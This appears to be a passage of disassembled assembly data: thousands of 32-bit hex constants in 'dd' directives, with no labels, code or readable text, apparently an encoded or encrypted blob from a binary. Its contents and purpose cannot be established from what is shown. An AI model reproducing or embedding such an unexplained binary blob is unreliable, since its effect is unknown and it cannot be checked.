		dd 4EF95267h, 0B60FB4A0h, 8E45775Fh, 1A4192B9h,	0BEC0257Ch
		dd 1E0E018h, 0EC555739h, 562E0C20h, 1810E793h, 6FBCB3BEh
		dd 0D21168DFh, 24A1C2F2h, 920C8906h, 5E2E74Dh, 0D740FC34h
		dd 0EA9ECCC4h, 0A6B635AAh, 543FC492h, 4E2F4BCh,	5F9CE5C1h
		dd 0D3ACC055h, 0C231914Eh, 0FD43AF09h, 267D8E4Ah, 0DC90B578h
		dd 0A6F82AC7h, 0FE11C0DCh, 0EF6ADA24h, 9A833D22h, 0DF8B1778h
		dd 6C4754AAh, 5469E23Dh, 391438E4h, 0E5B4175Ch,	2FE20E4Ah
		dd 0BAA1122Bh, 99085047h, 0EB810CA3h, 61B443E9h, 93D48FE1h
		dd 0E6592828h, 10A9955Bh, 80291F15h, 529A03BFh,	4144E270h
		dd 0F642CA17h, 0E4376211h, 6049A22h, 554690ADh,	5D252705h
		dd 1C413C82h, 0BA9A2259h, 0FD3AF768h, 0ACC70498h, 23794F8Ch
		dd 0E17E2A2Ch, 0F67CE781h, 2842A2B5h, 0C99F5127h, 88B553A2h
		dd 0CD7C45D3h, 342371E0h, 6C17983Eh, 1C5DD71Ah,	296845F2h
		dd 95664740h, 30D42F06h, 84D664E5h, 8029134h, 3344C5D6h
		dd 1E6D1EB8h, 0AE9CE053h, 42AEC48Ah, 0E4FDD280h, 0C409A61Dh
		dd 9A8D643h, 60E8DD61h,	0B8FB63BAh, 9DC8842Ah, 54AD7C14h
		dd 7155A206h, 516F94AAh, 280F235Ah, 0B2A657E9h,	0EC1B3D8Bh
		dd 3B690704h, 35611402h, 0E2020E86h, 1681E1FFh,	0C1F1A0E8h
		dd 0E2D859B6h, 74EA230Bh, 4B11A3A9h, 0AA0A28A0h, 0DDF946Dh
		dd 0FB220BA8h, 0D3D1811Dh, 5DE760EFh, 282D64F0h, 4FC20DCBh
		dd 0E3C1B7F1h, 6309E9DDh, 4BFED416h, 4542A9F8h,	0BFCD14BBh
		dd 0A7543AAEh, 0A3393C06h, 43D7DD6Fh, 0BDEC3904h, 550A253Ch
		dd 49EC8A10h, 5F65BBCAh, 46B66B16h, 0E8DF70D9h,	1FAABEFDh
		dd 0B919DA46h, 149E15E2h, 0AB68471Dh, 2C971368h, 0A266A060h
		dd 8A7C3450h, 21932BA0h, 85741684h, 8D8D9311h, 1E96245Bh
		dd 7F8FB2F8h, 32F70CD3h, 2C21FF37h, 4C029609h, 4A9CFDEBh
		dd 8B04C942h, 2CBEFCCDh, 7F080F96h, 63F0ACE3h, 0C643ABFBh
		dd 1B9A87AFh, 939D9C8Ah, 55F12FC7h, 0ACE920FEh,	6E727F9Bh
		dd 739DD34Ah, 62408D56h, 4D6617C3h, 91EBE717h, 0B1A38885h
		dd 288B540Ah, 9CF20578h, 7229B976h, 0C7FB299Ch,	0AEC6DE89h
		dd 0E8C7D36Fh, 2241320h, 188E91C9h, 4D59411Ah, 981F4611h
		dd 5FD314A7h, 396FFFC1h, 0BCD4FC9Ah, 22C9AB3Ah,	5A885D2Dh
		dd 0DE523FA8h, 420CD4D4h, 8C22AE6Dh, 2B2E72E6h,	49C65D22h
		dd 0D6C7A54Dh, 53D7902Dh, 387096E2h, 0DC8A7550h, 0D236C6Bh
		dd 0E28E206Ch, 6A2A0D94h, 51E772DBh, 51E5A8B3h,	82506A61h
		dd 4588B468h, 39F5C6CDh, 4AD8396Dh, 0CF2936CCh,	648392C1h
		dd 0BDE96945h, 9D87AAAEh, 7D9E3FEDh, 248838EAh,	2F14C457h
		dd 1C4FCA7Ch, 0E194FDA1h
		dd 2FCA9F7Bh, 950C5530h, 7804B2BAh, 0E882FE91h,	3A3010C4h
		dd 60FA7451h, 14919936h, 9D2C40C1h, 274D3A50h, 89D34E98h
		dd 0E23313A3h, 2C84E9h,	75114F14h, 427528C2h, 0A09D822Ah
		dd 0AC27313Ah, 0AC09544Eh, 0EB425713h, 3AE0D644h, 4EBC75B1h
		dd 1A0D9D74h, 1FD275Fh,	308C6DB6h, 8473CBA5h, 14471798h
		dd 0E661188Eh, 239A3288h, 488E1CCEh, 41F00473h,	9FD66A11h
		dd 0A9989657h, 0AFEDDE9h, 0E7CA34EEh, 9664F4DCh, 96528BABh
		dd 0CD68F184h, 0FFBC9C9Dh, 0CBF14F7h, 310A1664h, 468805E4h
		dd 213C226Dh, 4C4F0245h, 1D4F8A21h, 55132308h, 15842388h
		dd 91A2C902h, 78BCD94Fh, 0DE404AE2h, 0B85DA354h, 0B174975Eh
		dd 88D527A8h, 0A9EBA13h, 0F0CFD0DDh, 0EC47DCEh,	0D1A7BB15h
		dd 0D7B1428Eh, 26DB5CB5h, 4104148Ch, 0F4B644C7h, 0B9AFAB2Fh
		dd 0E2A0002Ah, 0D7045248h, 61F50A7h, 493D8E14h,	0CBABAB82h
		dd 6127F17h, 0F86093FFh, 321AFC17h, 7EE706FEh, 3892342Eh
		dd 0FDAA74E0h, 84BD0558h, 62956AE1h, 6958CA57h,	430B71B8h
		dd 7CD7A814h, 0F20E4486h, 0A3360DCAh, 543CBAB8h, 8F1A7FA7h
		dd 38215B32h, 2FE8E534h, 0C9FF1D30h, 0B0FCABF0h, 0FC220703h
		dd 6D1A5428h, 0AE328142h, 5E9E3C97h, 0B070C1ECh, 0DA04EB8Eh
		dd 76587B83h, 0C87DCC3h, 0D550B0D2h, 20C74E22h,	0DB87C457h
		dd 268A2B0Ah, 8254BA40h, 0E64400EDh, 8861BD9Dh,	8959335Dh
		dd 0E0FF7B6Bh, 0BDC8EFB4h, 0F7FC704Ah, 0BB5BFE36h, 6728C29Fh
		dd 52EB9DFEh, 0F814B08Ch, 0A2A5734Dh, 0FF2E77C1h, 55433AA8h
		dd 33C4B4DCh, 9BA1FA06h, 4C810C1Dh, 143FFE4Ah, 101F83B2h
		dd 0E8BE944h, 4E6F885Eh, 5C2FFC82h, 1FB6A56Eh, 0C0425CFEh
		dd 0DD18A07Fh, 0C9159254h, 4BFA0A7Fh, 7324373Ch, 15379153h
		dd 0E0C9BF89h, 11982866h, 22A2E1C0h, 0A0ABA4EAh, 6C821940h
		dd 51229563h, 28031ECh,	42657E50h, 5FC98806h, 7147C1Fh
		dd 8A7FF74Ah, 6862C057h, 0C6D1D4B9h, 5D2C29F1h,	90C4BFEAh
		dd 1D4BA818h, 0A625061h, 7D36400Ch, 0C955751h, 0C150F04Ah
		dd 0DDAB5D68h, 0BF000BC7h, 927F3BDFh, 2EE819ACh, 42B74F56h
		dd 3FA7A081h, 438087FEh, 0E3AEA439h, 0BD04AAACh, 0DA0ED89h
		dd 1D4178F7h, 99959DD6h, 0F4D4D8FEh, 0F943AF78h, 29FDFC21h
		dd 0E10FF494h, 0C7BA31C7h, 0BC11CA77h, 5457DDE0h, 0E8257A57h
		dd 9294A68Dh, 0ECD24EF8h, 64297EBFh, 0DA3F4110h, 1C243879h
		dd 0DC0BB067h, 80D11141h, 4F2A091Ah, 4826FD31h,	0AC17F821h
		dd 0E6918E78h, 84D4977Ah, 16C4C55Eh, 0B0960757h, 0D16F52D1h
		dd 0ACF12BA4h, 0A62D2159h, 553558E8h, 0FBD0541Fh, 0BE3ECBCCh
		dd 0F9A71AB2h, 7337C86Ah, 7490E7DEh, 9F559203h,	0E044DA37h
		dd 194FF46Bh, 35D3C4ADh, 6713AAFAh, 2EFB1456h, 0A02E10A8h
		dd 593D89D0h, 25DE3291h, 49190BF6h, 7AE5914Fh, 32C572EEh
		dd 0E18EEAEAh, 49ECDF2Fh, 298AE340h, 26AC5D5Eh,	76EDE7C6h
		dd 410AE48Fh, 37FEDF80h, 0E0168B51h, 0A8AA16A3h, 95F674E8h
		dd 4B3B759h, 34DA3029h,	0C4586067h, 7863D2AEh, 70AEFD06h
		dd 0F80A827Eh, 5E23B37Ah, 0B16E032h, 23F610B8h,	4C70618h
		dd 0C506E2A4h, 0AB0021A6h, 0D332953h, 7ED5C5C6h, 1211E961h
		dd 47967C6Dh, 0F10C18BBh, 6E504A40h, 9A409DFEh,	0BF66957Bh
		dd 688AFB26h, 6FA8F28h,	0CB157025h, 5A74C6FCh, 2C36195Bh
		dd 4D981145h, 0EF8EE95Dh, 634FAA11h, 12BE7D5Bh,	11F95472h
		dd 0D43F1540h, 4938EECAh, 19EF8BA0h, 0C1013E8Ch, 2BF04DAFh
		dd 0F3336637h, 0A69F7067h, 0E272EE82h, 0CA6EEFDCh, 5251102Eh
		dd 0FA4A7D6Dh, 0E885555Eh, 487FEA3Dh, 29C5DD0h,	2E5615D1h
		dd 88BFF5F9h, 16605FA6h, 0D74A3B3Bh, 317F9F5Fh,	8AB05DD8h
		dd 368514D2h, 0FC4DFEBAh, 0F5D283C4h, 5BB3D44Ah, 772012EAh
		dd 0A1A1D7CFh, 4C0DCE2Bh, 1FD39A10h, 55FE6024h,	2450E36Bh
		dd 19DE2FDFh, 41715A7Ch, 3078B739h, 0DE477579h,	530917EFh
		dd 6FA11178h, 0F8FBAB23h, 0F2EBD5FBh, 0EF17213h, 81B32662h
		dd 0ADBA4E52h, 68E285EBh, 0FD9D8225h, 3AE1BA95h, 0F83D4A1Ah
		dd 50507CAAh, 34EB71A7h, 0DB50BDDCh, 4F09DEF1h,	55F0B7D1h
		dd 0F54CDC29h, 48733A82h, 91CF6EB2h, 57C2020Fh,	40356651h
		dd 92002391h, 0CC13C597h, 251CAEEh, 34D06B28h, 6661B8CEh
		dd 7E79D000h, 0EC776C36h, 30572EA5h, 0B0579539h, 0B20163B6h
		dd 98EFE2F6h, 6D130DA9h, 2BB660FCh, 0BBD93B68h,	781E0ABh
		dd 54896C3Dh, 93D0F0F1h, 997240Bh, 90C4FCE0h, 6AF667A9h
		dd 0D2F25375h, 0C68FC838h, 0A2AF678Bh, 9E6357DFh, 636B5A26h
		dd 6FDDA7E8h, 43D7B0D5h, 3FF4F095h, 54C6DA66h, 3590011Ah
		dd 0D9D795F8h, 5588FC27h, 100D3C13h, 7FF71A82h,	3C303D3Eh
		dd 0A05BD63Bh, 99CDA644h, 9945267Ch, 18A82143h,	0FE693CA3h
		dd 0F1500427h, 1576032Dh, 40D9D845h, 42B031B1h,	5AF778F8h
		dd 1C817DDh, 12C114D9h,	213846h, 2A0AD976h, 0A400BD65h
		dd 80C6A5D5h, 0CAEF7C34h, 68D243F0h, 0DA804640h, 545D115Dh
		dd 989D6331h, 0C2C35BEDh, 850CA8F1h, 0E2B1293Ch, 43ED2ABDh
		dd 0AC6934DCh, 5175EBEBh, 0A891F30Ah, 0F2128F8Dh, 4A6BCC7Bh
		dd 0D73057D8h, 24AFC467h, 0A317DADh, 0B0D8C6Fh,	966FCAC6h
		dd 0F3029905h, 0CD170C2Eh, 9EB59518h, 0A4A148E1h, 51154171h
		dd 0B155818Bh, 101BDA6Eh, 2E373E86h, 71C19939h,	4AD4195Ch
		dd 0DAAC914Fh, 17CCAA8Fh, 0D8485B0Ah, 4928F7C7h, 0E6C2CCF5h
		dd 40DE428Fh, 32400253h, 0BEE2A0FEh, 0ECBECD54h, 830208ABh
		dd 0E301461Ch, 882BC3A4h, 419C3C35h, 0E9E37920h, 16602081h
		dd 1EBB7FA9h, 2BA0334h,	15D624F2h, 0DBC35C08h, 2771370Fh
		dd 46E1A67Dh, 19658634h, 0C1955189h, 229500DFh,	8E9A329h
		dd 4625C43h, 0DD9ACBAEh, 1D852ACh, 46F76CFh, 64BA9065h
		dd 50DA40C8h, 3CC476Dh,	0E898C351h, 0B698205Ah,	542134B8h
		dd 0CFF9B4E4h, 9F9BF82Bh, 8450D0D2h, 0DE923A86h, 56253D37h
		dd 73D0850Bh, 8AE80983h, 1CFD7235h, 29657B45h, 69A6B06Bh
		dd 0ACC6086Ah, 46D2E224h, 252E719Dh, 5D5776A2h,	531727Ch
		dd 0E03602Fh, 5569512Ah, 0E333F50Ah, 356E2998h,	6BCCA0h
		dd 28ADC444h, 5D16037Dh, 0A32BAFAEh, 54CAB081h,	3062CD2h
		dd 72A0357Ah, 44EEADAAh, 0EC252899h, 0FB2281Dh,	58366C93h
		dd 27A7E1AEh, 675958B3h, 75B2D33Ch, 0E0C937E0h,	29606C65h
		dd 0CDBB9DA6h, 4D54D00Bh, 434B26C2h, 37C7193Bh,	46802102h
		dd 0C62E64F8h, 3B8949ABh, 5607FB90h, 7AB98801h,	46ABFCA2h
		dd 691271D9h, 82EF49D3h, 64EA7CD5h, 25A8FF4Eh, 8B4C9A44h
		dd 5398C694h, 0DAD79F94h, 0D2C45DC0h, 9424994Bh, 5E070241h
		dd 231306EAh, 1EE3CE65h, 0C0036503h, 1630246h, 35235943h
		dd 1FCA50C3h, 0D5B6A973h, 92841568h, 440722C6h,	57C1022Dh
		dd 0FCCA04BAh, 4AB37762h, 0BF3DC0C9h, 2DF8BD86h, 0BA5E751Ah
		dd 8FA19D9Ch, 0F0D45999h, 88C705Fh, 5084D61h, 0EBA4B332h
		dd 0D728B35Dh, 0FEA724E5h, 84961617h, 1EBACD3h,	348C5085h
		dd 1334B87Ch, 26C9DB58h, 2930CDEh, 544D7AE6h, 8BDD4DCAh
		dd 260C3385h, 63467385h, 53814868h, 0BE05E75Eh,	370A6AC4h
		dd 0A5A643EFh, 81FCB35Bh, 5AF0C285h, 89A5C590h,	92B710BEh
		dd 0A38B2128h, 0B2295E73h, 7D9CBA4Eh, 234BA802h, 5BA1C04Eh
		dd 5A609534h, 681BD1C4h
		dd 0C57EBE52h, 0C6AD284Ch, 768CB78Bh, 3979B97h,	0D2D4A918h
		dd 5AB479A2h, 0A465753Fh, 0D6C5DFCFh, 414D1D4Fh, 0CF69178Bh
		dd 0F65D59CAh, 3D2F8FE5h, 17F36CA6h, 0E930B134h, 73513660h
		dd 0F5C4C2FCh, 98D8072h, 65040D6h, 0D7A03D14h, 0EC304D7Ch
		dd 10151460h, 334546CCh, 209EF4B2h, 2EA44873h, 4ACB7AD2h
		dd 1E84CE68h, 21FEAA26h, 42A3A2A7h, 66801C23h, 0A1E90C4h
		dd 0AB641448h, 376F0A03h, 0BFD66FFEh, 799780A7h, 665C6BBh
		dd 40B954E2h, 3C230AE2h, 0DA5A7A34h, 0B861DC5h,	6D509C88h
		dd 2765120Ah, 0ECFD863Dh, 9877531h, 47287A97h, 67F7CD75h
		dd 0AEED6E22h, 16267686h, 2EBF3E48h, 81E030A0h,	0F024B034h
		dd 0FF76CBFFh, 28ADC016h, 218856CDh, 0EA929847h, 9158AD9Ah
		dd 0EB37EE86h, 90ED418Bh, 0D0D9D169h, 0FC8D8180h, 339759EFh
		dd 0C6C2DA6Ch, 3AB24878h, 0BDA5EAF5h, 0E393BFDFh, 0FF2F4D93h
		dd 51FA8752h, 0CCB9B805h, 0A15B4106h, 7AD00BBCh, 9815358Ch
		dd 0ECA1326Eh, 0F871753Dh, 5B617AFDh, 5BA01066h, 0F093857Eh
		dd 0AA3040C3h, 8CA80547h, 1A9D91B6h, 0E2822195h, 26265EACh
		dd 0ACB88A01h, 4E30BAA0h, 1776411Ch, 5B1072C5h,	44936C98h
		dd 0DEB76753h, 0EE5D9774h, 7A0608F5h, 4BE4311Dh, 81178A42h
		dd 1AC67EB5h, 0DE18ECCEh, 11779334h, 8BBC5FE5h,	0DE494956h
		dd 1B2B356Fh, 34945FEFh, 7EE0F77Ch, 0DFE8A125h,	27CCAFDh
		dd 4061425Fh, 540232F6h, 47D7E435h, 0EF7C281Fh,	60494757h
		dd 0BCEC6D28h, 68A22BF7h, 1686C953h, 48BD3441h,	4E95250Fh
		dd 6C13DA13h, 1DB0832Ch, 250C1424h, 89F62984h, 48E2FBF6h
		dd 0FA6B3065h, 1A1AF944h, 20AFA348h, 94A3F70Ah,	0BF83B55Dh
		dd 0A91F052Eh, 7D38AE6h, 0FA389B67h, 0AE6E8D82h, 0B7C1CEE6h
		dd 9D10410Fh, 0B4818046h, 0C10B015Ah, 4692AF4h,	5AAEFC1Ch
		dd 0FA56E09Ah, 15916Ah,	12BBF294h, 0BF5CB754h, 0D9E85812h
		dd 0A82510BFh, 244A091Ch, 740677B0h, 0F80DE18Dh, 0BA3CA17Dh
		dd 0A9C0526Eh, 0F7B758E8h, 873E3CAEh, 0AEAB238Ch, 0B8798914h
		dd 4DD4EC26h, 0A9599652h, 861E267Ch, 89F83C1Fh,	304C03C0h
		dd 0F80F31FAh, 0C2FAFF9Ch, 50861EE8h, 0E704F75Ah, 134D3484h
		dd 0EE7E05FFh, 0AFE3F444h, 0F1DDFD74h, 8D94565Fh, 0A02E7F74h
		dd 7C8883E4h, 3FE45DEEh, 0F4E578A0h, 498FF481h,	0C1877D1Ch
		dd 7C03618Eh, 0FA17D234h, 2E2BA0D8h, 847A085Ah,	0BE7D479Eh
		dd 0F7ECEA73h, 3101D66Bh, 3429E0F8h, 3D222CF2h,	608435Fh
		dd 0BA1A80EAh, 0ADDEA1F2h, 0A34A1256h, 8C472A4Ah, 0D375246Dh
		dd 34E4AE34h, 0F8FE9924h, 40C32BA4h, 59959961h,	3E88947Eh
		dd 0D898338Dh, 6C6A8BA2h, 0CE7D4B57h, 6AF0CB43h, 323DA5Dh
		dd 237C5614h, 0FB9AF9B6h, 0B5480A02h, 4547967Fh, 8C9AB43Fh
		dd 5E04E448h, 71F61FAFh, 881B1F15h, 5DF32E09h, 0FFDEE100h
		dd 0A5778360h, 2ED10BBDh, 53CC4E46h, 1936F21Eh,	2AEEF927h
		dd 6EBE93B8h, 65A394FAh, 0A543E5D1h, 8562ACBBh,	77DF6168h
		dd 0D08AC482h, 0D4076D1h, 61ABBBB7h, 4CD3443Fh,	55A2AA9h
		dd 7AAB17D8h, 0E93364E6h, 0E8C68832h, 715CAB2Eh, 0A4414579h
		dd 0E54094B5h, 878A77B9h, 74A50B59h, 87974502h,	707ED695h
		dd 8D4D74D3h, 479DC342h, 910B4C12h, 0A3CB7329h,	0E0684541h
		dd 91F0575Dh, 967EEF02h, 0C88CDC95h, 60AA5028h,	3604BB8Fh
		dd 3D78BACBh, 6AEDE8BBh, 31D37E32h, 0F87CA417h,	0AFBC4323h
		dd 64F1501Ch, 15DD6776h, 49509E1Dh, 5ECB8CEDh, 682B5798h
		dd 5CD5B885h, 7A8C532Fh, 0F8BA7763h, 9067A4A4h,	81191FF2h
		dd 0BA9C8D72h, 1D7B2AF8h, 4AFF135Ah, 0C0C3140Ch, 3139D576h
		dd 0A850C3E2h, 83241E8Bh, 0B08B3650h, 0ED3DD7B9h, 848155AAh
		dd 93C0D18Ah, 28D91D80h, 3705C4DAh, 0F4C57720h,	0CA33D512h
		dd 0A6AA9F11h, 4A831572h, 0F5C4B675h, 0CD35C874h, 0B2879441h
		dd 0AE441ACCh, 0F7B823C8h, 3258429Bh, 9558B36Bh, 0EF568F74h
		dd 0EED9278Bh, 1F9E4B62h, 7960ED1Ch, 704ABAF8h,	0DACD6CEh
		dd 0C591DD2Dh, 15C0CF5Dh, 0D5974CC8h, 25D2C4BAh, 96397680h
		dd 757668C6h, 97761F6Ch, 2ADCE6D5h, 31B975ABh, 4A20E501h
		dd 0ADD3407h, 7F5F2BBEh, 394EB17Ch, 0AED2497Eh,	458BE982h
		dd 85CD9553h, 90C438C8h, 0AF5AC9D6h, 5D7BFA1Fh,	88CBC854h
		dd 0D42CA884h, 72162B2Eh, 0B5D195h, 0A09016A4h,	86BE3112h
		dd 98A53395h, 0D2208B69h, 6BFB40DDh, 61D977E3h,	0C34320h
		dd 5BE80857h, 0B20E6A6Fh, 0E0DC3E0Fh, 0D02AF1Dh, 3400E0A1h
		dd 7DD4738Ah, 905AA62Fh, 0D7403D6Ah, 19D82E12h,	97EEABC0h
		dd 0A65D778Ch, 0F86F177Fh, 0E09A22A6h, 8C21E172h, 175A9100h
		dd 416F2B22h, 0B3F223E9h, 0B128C052h, 7CC95C58h, 80B7264Bh
		dd 0FFBBF4D0h, 7D36AEC1h, 2D3BD731h, 8CAA5ED0h,	5D69CFE3h
		dd 0A13979CFh, 0CE5A5F82h, 2D63DDDEh, 0BEF2912Ah, 0DBD5F51h
		dd 0F530FB88h, 22457AEDh, 0C84A8Bh, 28ED8ED2h, 595B224h
		dd 0C1A44110h, 4671F208h, 50DCC41h, 553C5911h, 40BD405h
		dd 57B38939h, 41A9AC1Dh, 23E2E7FBh, 0A78B030Fh,	3F8C6994h
		dd 0BADB82Ah, 65A0D821h, 4BA6121h, 74F7A029h, 750AC6F1h
		dd 8309D312h, 1C5951CBh, 71CFFA00h, 9BC810E8h, 0E7D3975Fh
		dd 0A9DC0932h, 0E24522C0h, 7D030249h, 4112E2A0h, 3C02E54Eh
		dd 72ABFB19h, 34488FA6h, 0FF45D731h, 0EDAE8C23h, 7DC93DEBh
		dd 17A0D314h, 1A8F80A4h, 0B25495C1h, 594CB43Ch,	2EA4CAD5h
		dd 0B8BF7AE3h, 0D3BAEE69h, 1E5008D0h, 67C76565h, 325939B2h
		dd 8FCC78F8h, 3CA84576h, 0AB0D9314h, 0DD90A029h, 0CFEBFB50h
		dd 0A5B90A95h, 83E92A13h, 0AD5C7433h, 0ACEAF7C3h, 0C6C88E07h
		dd 0CA3AEADAh, 42C938F5h, 1122164h, 604400A5h, 0DBEEA089h
		dd 87A2B838h, 4584838Dh, 0D9BF02BDh, 0C1A238BFh, 57FC14F1h
		dd 0E93B60FCh, 22524D57h, 0F15AE55Dh, 0AC7FB2ABh, 0E0F86791h
		dd 7ADEE110h, 0B8750585h, 88611981h, 0FB384Eh, 0A7CF7DC4h
		dd 0DA973C0Fh, 0F83E54E1h, 0FC017DFBh, 2D0238B2h, 0E03679DBh
		dd 3E44F38Ch, 52B56210h, 1482AFA1h, 118C2BC9h, 0ACC69D72h
		dd 0BEB78FC5h, 5498425Ah, 0F2BEF9C7h, 9DC2CDEh,	2A61279Eh
		dd 2FEFF57Dh, 409D9ABEh, 0A511C1F3h, 6CBE5184h,	0B5517D2Ah
		dd 735C914Ah, 958A4475h, 0BE9790Ch, 545A5F25h, 14755867h
		dd 0D47FB5B1h, 0BB0E46D7h, 2AF85E79h, 28E1F94h,	942A7B52h
		dd 0ECCF34B8h, 5765D28Bh, 7C4A5301h, 33D70ABh, 0ED8FEFB0h
		dd 0EC2A1C7Fh, 4EE5AD45h, 901F8CCh, 0EC4E7EE9h,	0B8538F02h
		dd 5B11221Eh, 0AAC0EE62h, 65D45D3Ch, 7C8FC057h,	406C87D1h
		dd 99FBB147h, 0C9223798h, 0F185BBE7h, 0D2EBE6E1h, 80A16146h
		dd 1D5E12FBh, 0B3101A04h, 3014E68Bh, 4715BA41h,	0AD4DFF9h
		dd 2BE10345h, 0E7128F85h, 526EE57h, 0E94E4FA9h,	0E1C4018h
		dd 2CF8C8C6h, 85E26552h, 0AB00A72Ch, 486D75Ch, 0A02B08A1h
		dd 9A693024h, 5C7BCD92h, 4655EC6h, 0D25DA4D4h, 0CF590946h
		dd 70270424h, 0FA6E7CB5h, 0EB8D20E8h, 5253F1h, 59D280Dh
		dd 0D0C72A1Bh, 607E5E63h, 98965C28h, 1C0D575Dh,	6E57E88Ch
		dd 0EF831926h, 5D263E54h, 0B25E7F9Fh, 43116A8Bh, 0A026F94Eh
		dd 1549F30Bh, 903487E1h, 63117405h, 89EBB0AEh, 2C115D1Bh
		dd 0AE8C9781h, 1D09124Ch, 0DD48635h, 0C95882Ah,	0C20C0072h
		dd 60E79277h, 370248FAh
		dd 0E428289Dh, 0D8C8C585h, 8B7DD445h, 4A474572h, 610B0FBFh
		dd 0D485558Ch, 38225E17h, 6B380FBDh, 30AEF81Ah,	22ED60A0h
		dd 40EF2568h, 6FE0F50Ah, 632B9FCAh, 166DDBEFh, 0E444A40Ah
		dd 1EB8F7B0h, 0C1521EE1h, 588A0B8h, 88B835A2h, 0CDBD82EEh
		dd 0BB960117h, 0AEC31455h, 0EACB260Ch, 1975DC6Ah, 0AF7BEF48h
		dd 0A775C7E0h, 7E2F2F82h, 57879FD8h, 0C4F08D74h, 458F48A1h
		dd 4D9D2FF4h, 0DFE54D0Ch, 0BC2EB2EFh, 94215E96h, 0A97FF8B7h
		dd 0FA412865h, 0FDFA82Ch, 0FC76C923h, 0E17FAAEBh, 0A07C4F5Eh
		dd 0F701ABC8h, 0AEAD5FEAh, 44A76422h, 30E88389h, 0B3F4CAF6h
		dd 2A892B6Ch, 8A508453h, 602A5925h, 86109972h, 40ABE12h
		dd 3C452A0Ch, 56CA4881h, 39F37FAh, 0B1885290h, 0D066F557h
		dd 5214D201h, 5C6D6C52h, 168317BAh, 6C69455Fh, 88F819C9h
		dd 2D2F5F12h, 0E1CD9823h, 0A6836C0Ch, 610C6D74h, 8CCD7FBh
		dd 0EFE566ADh, 310BBA76h, 655C4012h, 0E69ABA62h, 55DEF4Bh
		dd 1D997ED6h, 404DC188h, 646B9A95h, 5E11E576h, 0EBA6A70Dh
		dd 0EB28C5Dh, 25B9CC77h, 61540698h, 0BD8C522Fh,	0E5EC068Eh
		dd 4C419549h, 0D88791F0h, 58EA6137h, 0D00FAE06h, 893DABD3h
		dd 86250316h, 404A500Ah, 88C02039h, 26414482h, 0A4030ECCh
		dd 0EF1A1083h, 80FA9758h, 17D18BFEh, 0A48FE2EAh, 2775DD01h
		dd 8C08913Bh, 5C178482h, 11405019h, 0B016530Fh,	59C57B36h
		dd 448D7E23h, 253E1F03h, 2E0043A0h, 0E8948A62h,	0D940DE09h
		dd 5D2E2EFCh, 0C3D2EC0h, 0B22BF3BEh, 0E61AD5CDh, 34D2DE18h
		dd 8700F2BBh, 0B4C10576h, 3C59A410h, 0BE190828h, 0FE90922Fh
		dd 900899Fh, 5249BBF7h,	0D200730Bh, 92A24B00h, 0A2AA0794h
		dd 6A639BBBh, 9217B044h, 71EA3B71h, 6555C2BAh, 22186C11h
		dd 5AA8478h, 1A52E599h,	350106FBh, 90FA6CD6h, 682A9EEAh
		dd 68ACDD2Dh, 0A6FD26CDh, 9F97E06Fh, 3E90FBB6h,	0CCA85ACBh
		dd 146063BEh, 3BCCEE89h, 61D4245Ch, 8054AC8Dh, 182CD8CCh
		dd 2AA314CAh, 0AD76D4D8h, 0A0C221E1h, 7E2420A0h, 64276DE8h
		dd 1550AAACh, 0AEABFE0h, 515B2E28h, 51D8CAADh, 762517C6h
		dd 531893D6h, 38CBD639h, 7F50C6F7h, 505456E0h, 0AB866C23h
		dd 6CB004E8h, 6F4AF197h, 31ADCB19h, 0EBCECE54h,	840FEC19h
		dd 0CD4A814h, 0F0BF0094h, 728BE6FBh, 40CCF6D4h,	3150CB75h
		dd 37FD80C9h, 0DFE68995h, 44E880F0h, 11700658h,	0FC1CAF87h
		dd 3C5F841h, 72A7CA5Eh,	0EE227F85h, 90A915DFh, 0BE8A1175h
		dd 0E3F4020Bh, 0ABE2A14Ch, 4CE52240h, 50505995h, 0BA312D5Fh
		dd 0BEA0E391h, 989D3B3Eh, 0CE177117h, 0BCA85FC4h, 2621D40Dh
		dd 0D423622Bh, 0EB01E797h, 0B28E2974h, 25BF4470h, 57EB8229h
		dd 0BA70B72Eh, 0BB1B7940h, 3CB3B12Bh, 42507455h, 0BDA6AF5Bh
		dd 8D95698Bh, 90F04F03h, 0C56A1A4h, 667D08ECh, 0AA75DC5h
		dd 28019911h, 0CAA092E9h, 0C46843ECh, 0FDC5EE8Dh, 37571633h
		dd 8EB094A9h, 439E4A8Ah, 2DE3D517h, 78ADCDC2h, 0B2AD7118h
		dd 74B7914Ah, 0D64F5645h, 0B5D63555h, 0A77E93BEh, 5BCE5EFCh
		dd 0D9B755ECh, 5EABAE32h, 0F30D01C5h, 7AF793BEh, 366CDF4Bh
		dd 75AAAAB8h, 572D9239h, 0CA407527h, 7A7DB816h,	5059076Ch
		dd 0EE2517B9h, 0ADB4D5F7h, 0DF92EB31h, 1A1728A6h, 68E031Fh
		dd 2CB1DA89h, 95F5C131h, 0EDEF2E95h, 0EC95B922h, 4DFEAD8Ch
		dd 54406DC1h, 52AB1981h, 31CE3295h, 0B99181C4h,	0A804832Eh
		dd 5AC84577h, 4A4C1C42h, 34887AE3h, 0A2C2Fh, 0A5B8A582h
		dd 4158D37Fh, 0FD143E08h, 7C19196Fh, 0E380B8C4h, 0C6C3377Ah
		dd 6A0C41D1h, 7486205Fh, 24CA7621h, 6FF1846Eh, 0C0539FEBh
		dd 30B6F5C0h, 4686E408h, 0BA54537h, 3B648409h, 7D765701h
		dd 0CD2C3A72h, 44EF84D8h, 3B48F176h, 0B0B44592h, 550642Ah
		dd 0A9C97219h, 59A7D907h, 0ACB044E5h, 6C9E7CEBh, 692DB3F7h
		dd 2A7336E2h, 9AE70E86h, 0BA9F1C6Bh, 4806AE48h,	573B2205h
		dd 574AB8C3h, 0AF1FD70Fh, 6CA2F6CAh, 21B5A7DCh,	0CEAFB3E3h
		dd 552896CAh, 0CF62401Eh, 0F409CC48h, 139AEEAh,	349365E5h
		dd 0DEF7AFB7h, 74A23B4Fh, 0B9ED6E12h, 8875A439h, 983FF84Eh
		dd 0EC6FDD5Eh, 0B8C3819Ah, 0ACE795EFh, 0C4546773h, 0E36BD069h
		dd 84E9DD34h, 0EE5DB280h, 0CA4805F9h, 2A8D258Ch, 27088826h
		dd 4479014h, 46C51DAFh,	70DB03D7h, 9591119Dh, 8AF890CEh
		dd 35B14065h, 1F4093E8h, 18410284h, 0E0FA60F5h,	0D15CEE91h
		dd 5D677C79h, 0A7CD5458h, 0CFC05D3Bh, 8273A381h, 0D9C7E76h
		dd 59088605h, 0EE903837h, 50D40A72h, 213290A1h,	0FB245D99h
		dd 1B238347h, 0F0682C6Ch, 0FCED80CDh, 83FAEF7Ah, 87BA7C68h
		dd 387C5C16h, 0A6C5BD36h, 0BF48C75Bh, 22BDDD8h,	0F2BA3E34h
